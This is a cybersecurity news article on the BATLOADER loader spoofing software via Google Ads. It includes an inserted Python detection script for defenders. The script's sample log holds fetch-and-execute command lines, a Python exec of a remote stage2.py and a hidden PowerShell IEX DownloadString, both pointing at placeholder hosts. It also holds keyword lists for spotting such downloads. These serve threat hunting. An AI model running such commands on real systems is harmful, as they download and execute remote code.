The Cyber Security News

BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads

March 11, 2023

The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif.

According to cybersecurity company eSentire, the malicious ads are used to spoof a wide range of legitimate applications and services, including Adobe, OpenAI's ChatGPT, Spotify, Tableau, and Zoom.

BATLOADER, as the name suggests, is a loader responsible for distributing next-stage malware such as information stealers, banking malware, Cobalt Strike, and even ransomware.



One of the key traits of the BATLOADER operation is its use of software impersonation tactics for malware delivery.

This is achieved by setting up lookalike websites that host Windows installer files masquerading as legitimate applications. The infection sequence is triggered when a user searching for the software clicks a rogue ad on the Google search results page and downloads the installer from the lookalike site.

Vidar Stealer and Ursnif Payloads

These MSI installer files, when launched, execute Python scripts that contain the BATLOADER payload, which in turn retrieves the next-stage malware from a remote server.

This modus operandi marks a slight shift from the earlier attack chains observed in December 2022, when the MSI installer packages were used to run PowerShell scripts that downloaded the stealer malware.
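The installer-to-interpreter hand-off described above (an MSI package launching a Python or PowerShell script that pulls the next stage) is something a defender can hunt for in endpoint telemetry. The following is an added example, not code from the article or from eSentire: it scans Sysmon-style process-creation records, one JSON object per line, for an installer host spawning a script interpreter whose command line reaches out for remote content. The sample log lines are constructed, the parent process name msiexec.exe is an assumption (the article does not name the parent process), and the hostnames are made up.

```python
"""Hunt process-creation logs for an installer spawning a script interpreter
that pulls a second stage, the hand-off this article describes.

Added example, not code from the article or from eSentire. Assumptions:
records are Sysmon Event ID 1 style, one JSON object per line with the
Sysmon field names; the rogue MSI runs under msiexec.exe (the article
does not name the parent); hostnames in the sample are made up.
"""
import json
from dataclasses import dataclass, field

# Interpreters reported in the chains: Python (March 2023) and PowerShell
# (December 2022).
SCRIPT_INTERPRETERS = {"python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe"}

# Assumption: Windows Installer packages execute under msiexec.exe.
INSTALLER_HOSTS = {"msiexec.exe"}

# Command-line fragments that suggest the script reaches out for more code.
DOWNLOAD_HINTS = ("urllib", "urlopen", "requests.get", "downloadstring",
                  "downloadfile", "invoke-webrequest", "http://", "https://")

# Constructed sample log: one Sysmon-style process-creation event per line.
SAMPLE_LOG = r"""
{"UtcTime": "2023-03-09 14:02:11", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "Image": "C:\\Users\\j.doe\\AppData\\Local\\Temp\\zoom-setup\\python.exe", "CommandLine": "python.exe -c \"import urllib.request as u;exec(u.urlopen('https://cdn.example.invalid/stage2.py').read())\""}
{"UtcTime": "2022-12-14 09:41:52", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/vidar.ps1'))"}
{"UtcTime": "2023-03-09 14:05:30", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Python311\\python.exe", "CommandLine": "python.exe manage.py runserver"}
{"UtcTime": "2023-03-09 14:06:02", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "Image": "C:\\Windows\\Temp\\vcredist_x64.exe", "CommandLine": "vcredist_x64.exe /quiet /norestart"}
{"UtcTime": "2023-03-09 14:07:45", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadFile('https://cdn.example.invalid/tool.exe','tool.exe')"}
"""


@dataclass
class Finding:
    time: str
    parent: str
    image: str
    severity: str
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict):
    """Return a Finding for a suspicious process-creation event, else None."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    reasons = []
    if parent in INSTALLER_HOSTS and image in SCRIPT_INTERPRETERS:
        reasons.append(f"installer host {parent} spawned script interpreter {image}")
    if image in SCRIPT_INTERPRETERS and any(h in cmd for h in DOWNLOAD_HINTS):
        reasons.append("interpreter command line fetches remote content")
    if not reasons:
        return None
    # Both signals together match the chain in the article; either one alone
    # is worth a look but also fires on ordinary admin or developer activity.
    severity = "high" if len(reasons) == 2 else "medium"
    return Finding(event.get("UtcTime", ""), parent, image, severity, reasons)


def hunt(log_text: str) -> list:
    """Parse JSON-per-line records and return findings in log order."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines rather than abort the hunt
        finding = score_event(event)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f.severity}] {f.time} {f.parent} -> {f.image}: {'; '.join(f.reasons)}")
```

Run against the constructed sample, the two msiexec.exe-to-interpreter events (the Python chain and the older PowerShell chain) score high, the cmd.exe-launched PowerShell download scores medium, and the developer's python.exe and the vcredist_x64.exe child of msiexec.exe are left alone. In a real deployment, the parent-child rule would be tuned against the organisation's own installer baseline, since some legitimate packages do run interpreters during setup.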


Other BATLOADER samples analyzed by eSentire have also revealed additional capabilities that allow the malware to establish entrenched access to enterprise networks.

"BATLOADER continues to see development and improvement since it first emerged in 2022," eSentire said.

"BATLOADER targets various popular applications for impersonation. This is no accident, as these applications are commonly found in business networks and thus, they would yield more valuable footholds for monetization via fraud or hands-on-keyboard intrusions."



Some areas of this short article are sourced from:
thehackernews.com


Copyright © TheCyberSecurity.News, All Rights Reserved.